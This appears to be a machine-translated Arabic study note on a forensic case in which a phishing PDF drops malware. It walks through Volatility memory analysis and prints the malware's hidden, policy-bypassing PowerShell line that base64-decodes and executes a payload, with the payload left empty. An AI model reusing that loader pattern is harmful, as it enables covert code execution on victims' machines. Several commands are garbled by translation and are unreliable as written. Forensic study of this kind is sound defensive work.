لقد قمنا بتغطية دراسة حالة للاستجابة للحوادث السيبرانية والتي تضمنت برنامجًا ضارًا لملفات PDF تم تسليمه عبر بريد إلكتروني تصيّدي. بمجرد فتح برنامج PDF الضار، تم إنشاء جلسة powershell في نافذة مخفية تنفذ أمرًا مشفرًا بـ base64 لاسترداد ملف ضار آخر من خادم C2. لقد استخرجنا العينة باستخدام المكونات الإضافية Volatility ثم قمنا بتحميل العينة عليها فايروس توتال و Any.run لتحليل البرامج الضارة ديناميكيًا واستخراج العناصر ذات الصلة.

ملاحظات دراسة الأمن السيبراني

Any.Run ملف تعريف مجاني

يسلط الضوء

اكتساب الذاكرة

يمكن إجراء استخراج ملف تفريغ الذاكرة بعدة طرق، تختلف بناءً على متطلبات التحقيق الخاص بك. فيما يلي قائمة ببعض التقنيات والأدوات التي يمكن استخدامها لاستخراج الذاكرة من آلة معدنية.

 FTK تصوير Redline DumpIt.exe win32dd.exe / win64dd.exe Memoryze FastDump dd

ما هو التقلب

يعد التقلب هو الإطار الأكثر استخدامًا في العالم لاستخراج القطع الأثرية الرقمية من عينات الذاكرة المتطايرة (RAM). يتم تنفيذ تقنيات الاستخراج بشكل مستقل تمامًا عن النظام الذي يتم فحصه ولكنه يوفر رؤية لحالة وقت تشغيل النظام

التقلب 2 مقابل التقلب 3

اعتمادًا على الإصدار المثبت من Volatility، قد يختلف بناء جملة الأمر. على سبيل المثال، في Volatility 2، يمكننا استخدام المكون الإضافي مباشرة باستخدام اسمه مثل إدراج العمليات مع قائمة البرنامج المساعد pslist، ولكن في Volatility 3 يتعين علينا كتابة اسم نظام التشغيل باستخدام المكون الإضافي بامتداد . الفصل بينهما. بالعودة إلى مثال قائمة العمليات، في Volatility 3، نكتب windows.pslist لاستخدام المكون الإضافي

هناك اختلاف آخر عند تحديد معلومات الصورة. في Volatility 2 يمكننا استخدامها مباشرة معلومات الصورة لتحديد نظام التشغيل واللاحق الذي نستخدمه --الملف الشخصي osname في الأوامر اللاحقة ولكن في Volatility 3 نستخدم إما Windos.info أو linux.info لتحديد تفاصيل حول نظام التشغيل ولا نحتاج إلى ذكر أو كتابة الملف التعريفي للأوامر اللاحقة.

الأوامر المنفذة في التقلب

سرد العمليات

التقلب -f case54.raw windows.pslist

سرد الملفات في نظام التشغيل

التقلب -f case54.raw windows.filescan

استخراج البرمجيات الخبيثة PDF

التقلب -f case54.raw windows.filescan | grep -i .pdf

إلقاء ملف PDF على الجهاز المحلي 

التقلب -f case54.raw -o /output/ windows.dumpfiles --physaddr

أمر powershell الذي تم تنفيذه بواسطة برنامج PDF الضار:

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -فوز مخفي -Ep ByPass $r = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('')); إكس $r؛

تجول الفيديو | تحليل كامل مع Any.Run

, , , ,
عرض التعليقات

معتصم

عن المؤلف

أقوم بإنشاء ملاحظات حول الأمن السيبراني وملاحظات التسويق الرقمي والدورات التدريبية عبر الإنترنت. أقدم أيضًا استشارات التسويق الرقمي بما في ذلك، على سبيل المثال لا الحصر، تحسين محركات البحث وإعلانات Google وMeta وإدارة CRM.

عرض المقالات